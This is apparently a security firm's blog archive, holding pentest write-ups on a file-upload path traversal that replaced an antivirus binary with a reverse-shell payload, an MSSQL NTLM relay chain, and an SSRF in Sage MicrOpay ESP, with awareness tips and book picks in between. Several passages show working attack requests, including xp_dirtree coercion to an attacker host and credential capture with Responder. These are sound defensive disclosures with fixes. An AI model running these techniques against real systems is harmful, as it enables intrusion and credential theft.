Anti-malware malware

This blog post aims to share a tale from a recent pentest that I felt was too good to keep to myself.

Note: The names of the innocent have been changed to protect the guilty.

Background

The testing involved a web application that was designed to guide users through an application process that required documents to be submitted to the server via a file upload. The client for this pentest was understandably concerned about the security implications of handling untrusted user-supplied files, so they devised a system that would vet said files for malware prior to making them available for review.

The basic process for validating the files was as follows:

  • The user requests a shared access signature (SAS) from an API endpoint
  • The file is uploaded directly to an "untrusted" cloud storage container using the SAS
  • A polling function detects the new file and triggers processing on a dedicated virtual machine
  • The virtual machine scans the file for malware and, if clean, sanitises and transforms the document before making it available for review

In terms of the architecture behind the system, a number of moving parts were introduced:

  • A cloud-based file storage container for hosting uploaded files
  • An API endpoint for generating shared access signatures (SAS) granting access to file uploads
  • A virtual machine responsible for performing antivirus checks and document manipulation of untrusted files
  • Polling functions that were executed once files were added to the cloud storage (to initiate the document sanitisation process)

Note: As the pentester, I had access to a lot of information about how the system worked behind the scenes, including the source code and the logging system, so I could verify whether uploaded files were processed successfully or not.

SAS API Endpoint

Shared access signatures (SAS) are signed requests that provide access to Azure’s Blob Storage. Access can be either read or write, depending on the usage requirements. In this instance, the application exposed an API endpoint that would generate the write-only SAS on behalf of the user, similar to:

GET /GetSAS?upload=Myfile.png HTTP/1.1
Host: application.example.com

Which would return:

https://example.blob.core.windows.net/untrusted/Myfile.png?sv=2012-02-12&st=2009-02-09&se=2009-02-10&sr=c&sp=r&si=YWJjZGVmZw%3d%3d&sig=dD80ihBh5jfNpymO5Hg1IdiJIEvHcJpCMiCMnN%2fRnbI%3d

The source code for this component resembled the following (NOTE: the actual code was C#/.NET, but I've used Python to demonstrate the logic):

def getSAS(filename):
    blobname = filename.split("/")[-1] # strip any path characters (only handles forward slashes)
    blobname = "untrusted/" + blobname
    sas = cloud.GetSAS(blobname, access="write") # cloud.GetSAS is a stand-in for the real storage SDK call
    return sas
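
For context, here is roughly what that stand-in GetSAS call would wrap with the current Azure Python SDK. This is only a sketch: the account name, key, and container are hypothetical, and the azure-storage-blob v12 package is assumed.

from datetime import datetime, timedelta
from azure.storage.blob import generate_blob_sas, BlobSasPermissions

def get_sas_url(blob_name):
    # Hypothetical account details; in the real application these live server-side
    token = generate_blob_sas(
        account_name="example",
        container_name="untrusted",
        blob_name=blob_name,
        account_key="<storage-account-key>",
        permission=BlobSasPermissions(write=True),  # write-only access
        expiry=datetime.utcnow() + timedelta(hours=1),
    )
    return "https://example.blob.core.windows.net/untrusted/" + blob_name + "?" + token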

There are a couple of problems with this approach.

First, the user-supplied filename was preserved by the SAS-granting API endpoint. The application generated a UUID for each file using JavaScript; however, as this was done client-side, the UUID could simply be overwritten with any filename, rendering the application's UUID-generation efforts fruitless.

Second, the above sample code failed to adequately strip non-forward-slash filesystem metacharacters out of the supplied filename. Beyond removing forward slashes (by way of truncating anything preceding the final forward slash in the filename), the application accepted filenames containing path characters such as ~, \, :, and .. This was a stroke of luck for the tester, as the SAS API would happily grant a valid SAS for paths containing such characters.
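
To see why that sanitisation falls short, here is a quick illustration using the same logic as the Python stand-in above (the filename is just an example):

# Splitting on "/" only strips forward slashes; backslashes and other path
# metacharacters survive and end up in the blob name the SAS is issued for.
filename = "..\\..\\..\\..\\supersecret\\Myfile.png"
blobname = filename.split("/")[-1]  # no "/" present, so nothing is removed
print("untrusted/" + blobname)      # untrusted/..\..\..\..\supersecret\Myfile.png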

As a result, it was possible to perform a directory traversal attack and write to additional file containers outside of the designated untrusted/ directory. For example, an attacker could write into a super secret container by using path traversal and backslashes (such as ..\..\..\..\supersecret) within their request:

GET /GetSAS?upload=..\..\..\..\supersecret\Myfile.png HTTP/1.1
Host: application.example.com

Which would return:

https://example.blob.core.windows.net/supersecret/Myfile.png?sv=2012-02-12&st=2009-02-09&se=2009-02-10&sr=c&sp=r&si=YWJjZGVmZw%3d%3d&sig=dD80ihBh5jfNpymO5Hg1IdiJIEvHcJpCMiCMnN%2fRnbI%3d

Although the SAS did not grant read access, it did grant write access. This meant that an attacker could overwrite known files both inside and outside of the designated container.

Whilst neat, this alone wasn't going to cut it. We have to get a shell, after all. And this river was running dry.

Time to regroup.

Cloud file storage and virtual directories

While testing the previously discussed directory traversal vulnerability, I noticed some curious behaviour. When requesting a SAS for a file within a nested directory tree (such as /this/is/Myfile.png), the file upload system would happily accept the upload and store the file at that path. For example:

GET /GetSAS?upload=this\is\Myfile.png HTTP/1.1
Host: application.example.com

https://example.blob.core.windows.net/untrusted/this/is/Myfile.png?sv=2012-02-12&st=2009-02-09&se=2009-02-10&sr=c&sp=r&si=YWJjZGVmZw%3d%3d&sig=dD80ihBh5jfNpymO5Hg1IdiJIEvHcJpCMiCMnN%2fRnbI%3d

As it happened, the file storage container would create a virtual directory structure to match the filename of the uploaded file.

The storage container for this example would look like this:

untrusted/
└── this
    └── is
        └── Myfile.png

This was starting to get interesting.

The virtual machine

So, at this point I knew that uploaded files would be downloaded to a virtual machine and then scanned for viruses. The application logic involved in this task resembled the following (NOTE: again, the actual code was C#/.NET, but I've used Python to demonstrate the logic):

import os
import subprocess

def trigger_scan(filename):
    file_contents = cloud.download_file(filename) # get the file from the blob store
    tmp_path = os.path.join(create_temp_path(), filename) # store this in a safe temp directory! (assume create_temp_path() returns "C:\Temp")
    with open(tmp_path, 'wb') as f:
        f.write(file_contents)
    x = subprocess.check_output(["C:\\Program Files (x86)\\AVProgram\\scanner.exe", tmp_path])
    # [...] Check that file was not malicious, then perform subsequent document transformation

So, upon successful file upload, the function trigger_scan would execute automatically, performing the necessary operations to validate, sanitise, and transform the supplied file. At first I toyed around with trying to escape out of the process execution call, to no avail (the arguments are passed as a list, so there was no shell to inject into).

What I could do, however, was control the filename that was concatenated by the Path.Combine function, using the previously discussed path traversal attack. I toyed around with uploading various files for a while and, after a bit of local testing with a minimal PoC, determined that if the second argument to the .NET method Path.Combine is an absolute path, the first argument is ignored and the supplied absolute path is returned.

According to the docs, this is intended behaviour:

“If one of the specified paths is a zero-length string, this method returns the other path. If path2 contains an absolute path, this method returns path2.” (Microsoft docs)

The following sample C# code demonstrates the vulnerability:

using System;
using System.IO;

namespace Program
{
    class Program
    {
        static void Main(string[] args)
        {
            string tmp = Path.GetTempPath();
            Console.WriteLine("Tmp path prefix is: {0}", tmp);

            string x = Path.Combine(tmp, "C:\\test\\a.exe");
            Console.WriteLine("Concatenated path is: {0}", x);
        }
    }
}

When executed:

C:\Users\Hacker>Hack.exe
Tmp path prefix is: C:\Users\Hacker\AppData\Local\Temp\
Concatenated path is: C:\test\a.exe
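
For what it's worth, Python's path joining behaves the same way on Windows, which is why the earlier Python stand-in reproduces the bug faithfully. A quick demonstration (using ntpath explicitly so the snippet runs on any platform):

# ntpath is the implementation behind os.path on Windows hosts
import ntpath

print(ntpath.join("C:\\Temp", "C:\\test\\a.exe"))  # prints C:\test\a.exe - the first argument is discarded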

At this point I had a revelation: I control the absolute path that the file that I am uploading will be written to.

Further testing

Using the power of supplied logs (thanks client!) I could determine certain characteristics of my exploit attempts. I started to enumerate the logged messages, with a particular focus on the error messages.

I tested a number of samples: a benign control file (no logged error; the application processed it successfully), the EICAR antivirus test file (infection found! Oh no!), and then benign files written to various locations on the system, such as C:\Windows\System32\a.png (Permission denied!) and C:\test.png (no logged error; processed successfully). At this point I knew I was onto something: if I could successfully write a file to C:\, then the user account performing the operation had to be highly privileged.

Putting it all together

So, to recap; at this stage I:

  • Was able to obtain a valid SAS for blob names containing arbitrary path characters
  • Could control where the file was written to disk
  • Had the location of a file that was guaranteed to be executed upon successful upload
  • Appeared to be able to write files as a privileged user

I hope you can see where this is going.

Payload

First things first, I needed a payload. I was quietly confident that no competing AV would be in play here (since I knew the AV engine in use), so I went from zero to yolo and smashed out a meterpreter reverse_https payload using msfvenom.

Staging the payload

I then needed a valid SAS for my target payload. As discussed previously, I could inject valid filesystem metacharacters into my filename, with the exception of /. I was not prepared to risk using space characters in the payload, so I opted to use another Windows trick: the short name. Long story short (pun totally intended), Windows short names are a means of providing mostly-unambiguous 8.3-style representations of path names that don't fit the legacy MS-DOS naming format. As usual, it's some relic from the past that is required for backwards compatibility. Don't think about it. It's probably better that way.
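
If you're curious what the short name for a given path is on a Windows box, something like the following ctypes snippet will show you (a rough sketch; Windows only, and the exact ~N suffix varies from system to system):

# Rough sketch: resolve a Windows 8.3 "short name" via GetShortPathNameW (Windows only)
import ctypes

buf = ctypes.create_unicode_buffer(260)
ctypes.windll.kernel32.GetShortPathNameW("C:\\Program Files", buf, 260)
print(buf.value)  # typically C:\PROGRA~1, though the suffix depends on the system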

Anyway, my payload ended up looking like this:

GET /GetSAS?upload=.\C:\PROGRA~1\AVProgram\scanner.exe HTTP/1.1
Host: application.example.com

Oh yeah, that's right. My goal here was the goods. I wasn't just going to compromise this server. No: I was going to replace the AV's executable with my payload.

Anyway, the previous request returned the SAS:

https://example.blob.core.windows.net/untrusted/C:/PROGRA~1/AVProgram/scanner.exe?sv=2012-02-12&st=2009-02-09&se=2009-02-10&sr=c&sp=r&si=YWJjZGVmZw%3d%3d&sig=dD80ihBh5jfNpymO5Hg1IdiJIEvHcJpCMiCMnN%2fRnbI%3d

Upload… annnnndddd

I then uploaded the file to the SAS endpoint, and within seconds Metasploit had made a new friend 😀

Bonus points: The trigger_scan() function was running as the NT AUTHORITY\SYSTEM user!

Bonus Bonus points: The AV program is toast at this point; I’ve replaced the binary with a malicious .exe. This has the interesting side-effect of ensuring that any time a legitimate user uses the application as intended, I get a shell.

Bonus Bonus Bonus points: The application now outright fails to complete its primary purpose of scanning untrusted files for viruses.

Recommendations

Honestly, I am kind of astounded that any of this actually worked. Fortunately, there are numerous ways that the exploit in question could have been trivially stopped dead in its tracks.

  • Flatten filenames to a GUID <- this would have done it
    • Have the SAS endpoint generate a filename for the destination file using a GUID, rather than accepting the user-supplied one (see the sketch after this list)
  • Copy the file to the filesystem sans-extension
    • Extension was unnecessary in this context, given the operations required (i.e. AV scanning)
  • Don’t run services as SYSTEM/privileged users…
    • In this instance, given that the AV was executing on demand against a file, administrator privileges were unnecessary
  • Restrict storage container access for the SAS
    • Also don’t let it create virtual directories
  • (Less recommended) If you are going to accept the untrusted filename, sanitise ALL file path metacharacters
    • Probably don’t do this though. Seriously.
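
To illustrate the first recommendation, a hardened version of the earlier SAS endpoint might look something like the following sketch (same Python stand-in style as before; cloud.GetSAS remains a placeholder for the real SDK call):

import uuid

def getSAS(filename):
    # Ignore the user-supplied filename entirely; the extension is also dropped,
    # since it isn't needed for AV scanning (see the second recommendation above)
    blobname = "untrusted/" + str(uuid.uuid4())
    return cloud.GetSAS(blobname, access="write")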

There’s just something deeply philosophical (and satisfying) about defeating an anti-malware system by overwriting the anti-malware program with malware.

The top five questions asked at security education and awareness presentations

Online security can be frustrating and confusing for end users, which leads to a greater number of successful cyber-attacks. Attackers are becoming more sophisticated in line with advancements in online technology, and things go wrong when the end user is confused: attackers prey on this confusion and supplement it with fear. Many issues relating to cyber security can be avoided by demystifying the threats, methods, and motives, and by providing simple advice for online safety. That’s where security education and awareness presentations come in.

The team at Asterisk deliver many education and awareness presentations to clients covering information security policy and demystifying online threats. These presentations also educate users on security controls (both technical and non-technical) that they can apply easily at home and in the office.

From C-level executives to IT Managers, support desk, workshop and administrative staff, everyone has a question to ask. Here are the top five questions we are regularly asked at security education and awareness presentations:

Q: “How do I make my passwords secure?”

A: We recommend using passphrases instead of passwords. A passphrase is a group of words, such as “Sunny Commodore Apple Polyester”, that is easy for you to memorise but hard for attackers to crack. The trick is to make sure the words are random; anything that would be obvious to people you know or who follow your public social media accounts, such as your favourite sports, animals, or TV shows, should be avoided.

Where you can, we also recommend turning on multi-factor authentication, so your account will perform a second check (or factor) before letting you in. The most common second factor used for personal services is to send an SMS to your mobile phone. This means that even if your password is guessed or cracked, the attacker won’t be able to get into your account without the second factor – your phone.

If you would like to read more about passwords, we recommend the NIST Digital Identity Guidelines (SP 800-63B).

Q: “Are password managers safe to store all my passwords?”

A: Generally yes, password managers are a safe place to store your passwords, as long as you choose a good one! There are a number of free and subscription-based password managers on the market so we recommend reading reviews before deciding which one to use. Some products allow you to sync your passwords across all your devices so you can have access on your desktop, laptop or phone, and others will include a secure password generator that will create strong passwords for you. Remember, your password manager is only as secure as your master password. We suggest you always enable two factor authentication and use a strong passphrase rather than a password to access your password manager.

Q: “Are banking apps on my phone safe to use?”

A: Yes, if they are installed from the genuine app store (the Apple App Store or Google Play Store) and the bank is a major player in the Australian market. Always use trusted apps and never install an app from a website or email link. The bank should be listed as the app publisher or seller. If you have any suspicions about the authenticity of a mobile banking app, contact your bank for verification.

Also, remember not to store any of your banking passwords or other information that could be used to access your bank accounts on your device.

Q: “Is it safe to use public or 'free' Wi-Fi when available?”

A: Connecting to public, free Wi-Fi comes with several risks. Public Wi-Fi networks are generally not encrypted, which means anyone nearby with some basic monitoring tools can see the information passing between your device and the access point you are connected to. In our opinion, the safest option is to not use these networks at all, but if you do find yourself needing to connect to a public Wi-Fi network, consider using a trusted virtual private network (VPN) to encrypt the information moving across your connection, and never log in to online banking sites or websites that store your credit card information.

It’s also good practice to turn off Wi-Fi or Bluetooth connections when not in use, which is also great for your battery life!

Q: “Can I use the same strong password on many sites?”

A: Reusing the same password across different accounts is never a good idea. If one site is breached or someone gets hold of that password, they can use it to access multiple accounts. You should always use unique passwords for your work and personal accounts and be extra careful with sensitive accounts like online banking or accounts with a lot of personal information like MyGov. If you think your password may have been compromised or you notice anything suspicious, change your password immediately and report it where appropriate. Password managers can assist with keeping track of different passwords and generating strong passwords that are less likely to be guessed or cracked.

 

Security education and awareness presentations are not just “one size fits all”. Surveys are conducted to identify gaps in staff knowledge, then training content is tailored to cover those gaps and fit the culture of the business. By undertaking training, staff can learn how to work safely online and create a culture of security – both at work and at home.

For more information about how a security education and awareness presentation can benefit your organisation, contact the team at Asterisk on 1800 651 420 or contact@asteriskinfosec.com.au

 

NTLM Relay Backflips

A little while back we were conducting an application security test for a client, when we managed a fun little backflip with NTLM credential relaying that we felt was worth sharing.

The application was at first glance quite unremarkable. A fairly typical Windows thick client, an application server, and a back-end MSSQL database server. As it usually does, the fun started with one of those ‘huh, that’s interesting’ moments. Looking at some XML configuration files in the thick client’s directory we found a handful of base64 encoded values with names like ‘DBUsername’ and ‘DBPassword’, next to some plain-text host names and port numbers. Attempting to decode the base64 resulted in illegible binary garbage, so they were obviously encrypted. It seems likely that the application developers assumed that an attacker would give up at this point, but we are nothing if not stubborn, and our thinking was that if the client software was able to decrypt these credentials, and we had a copy of the client, we MUST be able to decrypt them as well.

Initially we braced ourselves for a tedious reverse-engineering process, but were quickly relieved to find that the relevant binaries were all managed .NET, meaning we were able to simply decompile them back to extremely legible source code. Grepping the source for the string ‘crypt’ very quickly identified the function responsible for the encryption and decryption of our stored database credentials, along with a hard coded key and IV, both of which were based very closely on the name of the software vendor.

After some short work in python reimplementing the decryption function from the application, we were the proud owners of some shiny new database credentials, but what could we do with them? Logging into the MS SQL Server instance we found that even though this WAS the same server used by the application for its main database, the credentials we had were only able to access a smaller, less interesting database on the same server. The client retrieved its most sensitive data using a more traditional approach, i.e. via an application layer server with its own back-end connection to the database.
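
For illustration, the Python reimplementation amounted to something like the following (a rough sketch only: AES-CBC is assumed, and the key, IV, and string encoding shown here are hypothetical stand-ins for the redacted originals):

# Rough sketch of reimplementing the client's config-value decryption.
# The real key and IV were closely based on the vendor's name; these are placeholders.
import base64
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

KEY = b"VendorNameVendor"  # 16-byte hard-coded key (hypothetical)
IV = b"VendorNameVendor"   # 16-byte hard-coded IV (hypothetical)

def decrypt_config_value(b64_value):
    ciphertext = base64.b64decode(b64_value)
    decryptor = Cipher(algorithms.AES(KEY), modes.CBC(IV)).decryptor()
    padded = decryptor.update(ciphertext) + decryptor.finalize()
    return padded[:-padded[-1]].decode("utf-8")  # strip PKCS#7 padding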

‘xp_cmdshell’, that eternal hacker favourite, was not available to our user. If we wanted to find a way to pop the database server itself we were going to need to get at least a little bit creative.

Next we tried another classic trick using a different extended stored procedure, ‘xp_dirtree’. xp_dirtree essentially asks the SQL Server instance to provide a directory listing of a given file path. By providing a UNC path directing the server to an attacker-controlled host, one can usually use tools like Responder or ntlmrelayx to capture a NetNTLMv2 hash of the SQL Server service account password, or relay the service account’s credentials and use them to authenticate via SMB to a secondary host. While we were able to capture a hash, the password configured was strong enough to resist our cracking efforts in the time we had available. Further, we were unable to relay the credential via SMB to any of the in-scope hosts, as all had been configured with SMB signing set to the dreaded ‘REQUIRED’, making our relayed credentials worthless.
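
(For reference, coercing that outbound connection looks something like this when driven from Python; the server, credentials, and attacker host below are all hypothetical.)

# Sketch: coerce the SQL Server service account into authenticating to an
# attacker-controlled host via xp_dirtree and a UNC path.
import pyodbc

conn = pyodbc.connect(
    "DRIVER={ODBC Driver 17 for SQL Server};"
    "SERVER=target-sql01;DATABASE=master;UID=appuser;PWD=<recovered password>"
)
conn.cursor().execute(r"EXEC master..xp_dirtree '\\attacker-host\share', 1, 1")
# Responder or ntlmrelayx listening on attacker-host captures (or relays) the auth attempt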

Foiled.

But wait! NTLM authentication can be relayed to authenticate for many other protocols, including HTTP and MSSQL! Maybe the usual rules against reflecting NTLM authentication back to the source host wouldn’t apply in a cross-protocol scenario like this? Nope, they still apply.

Foiled again.

At this point we became a little frustrated and went back to basics, digging a little deeper into some earlier reconnaissance data we had acquired, including some gathered using Scott Sutherland’s (@_nullbind on Twitter) amazingly useful PowerUpSQL PowerShell module. PowerUpSQL will enumerate (among many other things) the links between one database server and another. These links are especially common in scenarios where you have a primary ‘operational’ database server and a secondary server that acts as a ‘data warehouse’, with data regularly being groomed from one database and archived in the other, which is exactly the scenario it identified for us in this case.

Sending queries via the first database to the data warehouse did not immediately yield any particularly useful results. We were similarly low-privileged in the data warehouse, and it was beginning to look like something of a dead end, when we suddenly realised that we already had everything we needed to own the whole box and dice.

First we set up ntlmrelayx to catch SMB authentication attempts against our attacker-controlled host and relay them on to the same MS SQL Server port as before, only this time instead of running xp_dirtree on the first server, we used the database link to send the same xp_dirtree query to the second server. It attempted to connect to our host, which negotiated NTLM authentication and then relayed the authentication attempt back around to the first server’s MS SQL Server port, essentially completing a full loop.
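
In terms of the actual query, the loop looked conceptually like the following sketch (the linked-server and host names are hypothetical, and ‘EXEC ... AT’ assumes RPC Out is enabled on the link):

# Sketch: ship the same coercion across the database link so that the *second*
# server connects to us, while ntlmrelayx relays the resulting NTLM authentication
# back to the *first* server's MSSQL port.
import pyodbc

conn = pyodbc.connect(
    "DRIVER={ODBC Driver 17 for SQL Server};"
    "SERVER=target-sql01;DATABASE=master;UID=appuser;PWD=<recovered password>"
)
conn.cursor().execute(
    r"EXEC ('xp_dirtree ''\\attacker-host\share'', 1, 1') AT [DATAWAREHOUSE-LINK]"
)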

We were back where we started, but now we were authenticated as the SQL Server service account, which had local Administrator privileges on both SQL servers, and thus was granted full ‘sa’ privileges on them as well. With admin access in hand we were able to enable the ‘xp_cmdshell’ extended stored procedure and use it to execute shell commands in the underlying OS as a full admin user. We won’t go into full detail here but after this breakthrough it was a matter of mere minutes before we were able to gain full control of the entire AD/Windows environment.

So, what are the take-home lessons from all of this?

Don’t hard-code credentials and encryption keys into your application configs or binaries. If your security design relies on doing this, you’ve designed it wrong.

Don’t let users log directly into the database server – make them go via an application layer server.

Disable SQL Server extended stored procedures that aren’t needed, including xp_cmdshell, xp_dirtree, and xp_fileexist.

Outbound firewall rules matter almost as much as inbound. If your backend servers don’t need to speak SMB to the client, don’t let them!

… and while SMB signing is an extremely underrated and effective security control, no single security control is ever completely effective in the face of a determined adversary.

Our favourite infosec books

We have a clever bunch working here at Asterisk. From directors to testers, consultants, and business development managers, everyone is passionate about information security. There may be regular debates over music, coffee vs tea, and the best place for lunch in the city, but we’re all on the same page when it comes to information security.

To share our love of all things infosec, we surveyed some of the team on their favourite books. These 11 titles have educated, enlightened and entertained and come highly recommended for anyone interested in information security…

 

I loved ‘The Cuckoo’s Egg’ by Cliff Stoll. In the 80’s Stoll was an admin for a university shared computing system and investigating a minor accounting discrepancy led to him basically uncovering a spy ring working for the Russians. True story.

Mike Loss, Senior Security Consultant

 

‘Future Crimes’ by Marc Goodman is the book that sparked my initial interest in infosec and gave me the urge to explore a career in the industry. I picked it up at an airport book store (I actually thought it was a true crime book – didn’t realise it had anything to do with infosec) but was hooked from the first few pages. It made me realise that just about everything is connected, and as a result just about everyone is vulnerable. I made a decision there and then to try and learn more/get involved in the industry. Also, I encourage anyone who assumes that information security is purely about technology to give ‘Social Engineering: The Art of Human Hacking’ by Christopher Hadnagy a read. It uses a lot of real-world examples and made me question why we so often focus on information security strategies that tend to address technology and product as opposed to people and process.

Sam Moody, Business Development Manager

 

‘Firewalls and Internet Security: Repelling The Wily Hacker’ by William R. Cheswick and Steven M. Bellovin was the book that started it all. First published in 1994, it was one of the earliest (and definitely one of the greatest) books on network security. ‘The Web Application Hacker’s Handbook’ by Marcus Pinto and Dafydd Stuttard was (is) the bible for web application security testing. It’s a little dated now (published in 2011), but still very relevant and full of some great knowledge. Another favourite is ‘The Browser Hacker’s Handbook’ by Christian Frichot, Wade Alcorn and Michele Orru – because Christian is a hipster God, and we all miss him very much.

David Taylor, Principal Security Consultant

 

I read ‘The Cathedral and the Bazaar’ by Eric S. Raymond almost 20 years ago and it was an insight into the world of monopolies and how to succeed without selling code – how Netscape survived, and the differences between top-down and bottom-up approaches to development.

Daniel Marsh, Security Consultant

 

I usually get bored of “career advice” books pretty quick but I picked up ‘Women in Tech’ by Tarah Wheeler after following Tarah and some of the other contributors on Twitter. The advice in the book is stellar, but what I loved most were the personal stories from successful women in tech like Brianna Wu and Keren Elazari woven through.

Cairo Malet, Security Consultant

 

‘Gray Hat Python: Python Programming for Hackers and Reverse Engineers’ by Justin Seitz is a good way to learn both scripting/programming and practical offensive security. Some of the content is a little dated, and for the most part better tools exist to do the tasks that are covered. However, the step-by-step approach provides a great foundation for some common offensive security tools and processes.

Clinton Carpene, Security Consultant

 

The novel ‘Neuromancer’ by William Gibson tells the story of a washed-up computer hacker hired by a mysterious employer to pull off the ultimate hack. The Matrix, cyberpunk, implants – Gibson’s dystopian future is a classic. Another novel, ‘Snow Crash’ by Neal Stephenson, presents the Sumerian language as the firmware programming language for the brainstem, which is supposedly functioning as the BIOS for the human brain. Stephenson is next level Gibson and features the Matrix (Metaverse) and cyberpunk references. Stephenson can get heavy, and satiric, but again it’s a classic for the genre.

Steve Schupp, Managing Director

 

What’s your favourite infosec book?

 


 

Server-side request forgery in Sage MicrOpay ESP

Asterisk Senior Security Consultant Mike Loss shares a story from a testing engagement that was fun for us, moderately bad news for our client and ultimately worse news for a vendor. Spoiler alert – this story has a happy ending.

During a testing engagement last year I was working on a web app called “Sage MicrOpay ESP”. ESP stands for Employee Self-service Portal, and it’s a pretty standard HR web app, allowing employees to enter timesheets, book leave, etc.

Looking at the first handful of requests made by the browser when loading the page, one stood out immediately as… odd.

https://esp.REDACTED.com.au/ESP/iwContentGen.dll/start?InitialPage=100&NOLOGIN=Y&PageReadOnly=N&MAE=N&HAE=N&CommonDatabase=53227%20EvolutionCommon&CommonServer=REDACTED-SQL02&US=03dbbb66-cf9b-46de-97cb-cfa450de93bf

There are a few file extensions that really set the spidey-sense tingling when it comes to web apps. The list is long, but classics include .pl, .sh, .exe, and in this instance, .dll.


Looking through the URL parameters in the request, something else stood out – the ‘CommonDatabase’ and ‘CommonServer’ parameters. It seemed pretty odd that the user would be in control of a web app’s database connection. At first I doubted that was what was actually happening but once I noticed that the value in ‘CommonServer’ matched the naming convention of the target organisation’s server fleet, I became more confident that I was on to something.

Put simply, it turns out that one of ESP’s very first actions upon loading was to tell the client’s browser: ‘Hey I need you to tell me to connect to a database server. You should tell me to connect to this one!’.

There’s essentially no reason for a web application of this type to ever ‘ask’ a regular client which database on which server the application should connect to. In any sane application this value would be in a configuration file, somewhere inaccessible to normal users of the application.

So of course I did what any normal tester would do: I threw a bunch of garbage at the interesting parameters to see what would stick.

Most things I tried at first resulted in the request timing out, but we maintain a pet DNS server for just such an occasion. Keeping an eye on the query logs for the server and sending the request again with our DNS name in the ‘CommonServer’ parameter resulted in a lovely sight.

At the very least we have some kind of server-side request forgery in play. The obvious next step for us was to see what else we can get the server to talk to. Internal hosts? Hosts out on the Internet?

The thing clearly wants to talk to a database server… let’s give it a database server. The .dll file extension tells us it’s on Windows, so MSSQL is an obvious place to start.

Starting up a netcat listener on port 1433 on a host in AWS and then sending our DNS name in the ‘CommonServer’ field generated exactly the result we’d hoped for.
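
If you don’t have netcat to hand, a few lines of Python on the listening host do the same job (a minimal sketch; 1433 is simply the default MSSQL port):

# Minimal sketch: bare TCP listener on 1433 to confirm the server-side connect-back
import socket

srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(("0.0.0.0", 1433))
srv.listen(1)
client, addr = srv.accept()
print("Connection from %s:%d" % addr)
print(client.recv(4096))  # the first few bytes of the TDS pre-login handshake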

So we have a web application on the inside… and it thinks I’m its database server…


I wonder if I can get it to send me credentials?

The obvious tool for the job here is Responder. It’ll happily impersonate a server, then negotiate and accept more or less any authentication request that a client is willing to send it, then serve up the resulting credentials on a platter.

After repeating the process with Responder in place of our netcat listener, we get some creds!

Fun for us, but moderately bad news for our client.

At this stage I was moderately disappointed by the quality of the very obviously default creds, especially since they were no good to me in terms of further attacks on the target infrastructure.

I started goofing around with the format of the server address, trying out UNC addresses, internal addresses, specifying ports, that kind of thing, and eventually hit on a UNC-style formatting of the server name…

…which made my Responder go off like crazy.


For those not familiar with NTLM authentication, it APPEARS that the application has interpreted our gently mangled server name as a UNC path, in such a way that it thinks it needs to get to the database via SMB.

As a result, it’s connected to my Responder listener on port 445, and Responder has told it to authenticate via NTLM. The application has kindly obliged and we end up with a NetNTLMv2 hash – that long string of yellow alphanumerics at the end of the image.

Now, a NetNTLMv2 hash is quite a lot slower to crack than a regular NTLM hash if you want to actually recover the password, but if you notice that ‘$’ at the end of where I’ve redacted the username? That means the account being used to authenticate is the AD account of the actual server itself. That means the password is randomly generated and LOOOONG.

Never going to crack it. Just not gonna happen.

What we COULD do however is relay the authentication attempt… IF the target organisation had any services facing the internet that used NTLM authentication AND allowed connections from computer accounts. This might seem unlikely at first, but ‘Authenticated Users’ includes computer accounts, and heaps of sysadmins grant rights to ‘Authenticated Users’ where they should really use ‘Domain Users’. In any case, our target organisation didn’t have anything else with NTLM auth facing the Internet so it’s at this point that the attack becomes kind of academic.

In addition to this particularly entertaining issue, we also identified a number of other issues with the application, including unauthenticated access to staff names, phone numbers, addresses, and other sensitive PII.

After delivering the report to our client we began the least fun part – the disclosure to the vendor.

It turns out that ‘Sage’ is a pretty big company, and finding anyone responsible for infosec matters was non-trivial.

I started with the support email on the website. While the staff at the other end responded very quickly, there seemed to be a breakdown in communications.

Sage support continued to insist that I needed to provide a customer number before they would provide me with any support services. I tried explaining that I wasn’t asking for support services…

And then they stopped replying to my emails. 🙁

So I tried the traditional “security@” email address… Not a peep.

I asked around with some industry contacts… Nobody knew anybody who worked at Sage.

Finally I resorted to what I think of as ‘the Tavis’: publicly asking on Twitter whether anyone could put me in touch with a security contact at the vendor, in the style of Tavis Ormandy.

Turns out Tavis is a smart guy (who knew, right?) because this worked… real fast.

Without boring you to death with details, I almost immediately received a phone call from an actual dev, who was actually familiar with the app, and who actually wanted to fix the problem!

I passed along the details, they fixed the issues, and a patch came out about a month later.

Finally, because we’re meant to be trying to actually make things better when we hack stuff, I’d like to go over a quick summary of the ways this could have been prevented.

On the dev side, the most obvious part is that the client should not have ever been given the opportunity to choose the back-end database server. It should have been set in a config file somewhere.

Of course, we can’t expect vendors and developers to always do the right thing. Strict outbound network filtering would’ve prevented both the MSSQL and NTLM credential exposures. Your computers almost certainly do not need to talk to things on the public Internet on tcp/445 and tcp/1433, so don’t let them!

Sage were very helpful and friendly (and appreciative) once I actually made contact with the right group within the company, but getting there was unnecessarily difficult. Monitor your security@ address and publish a contact on your website for vulnerability disclosure.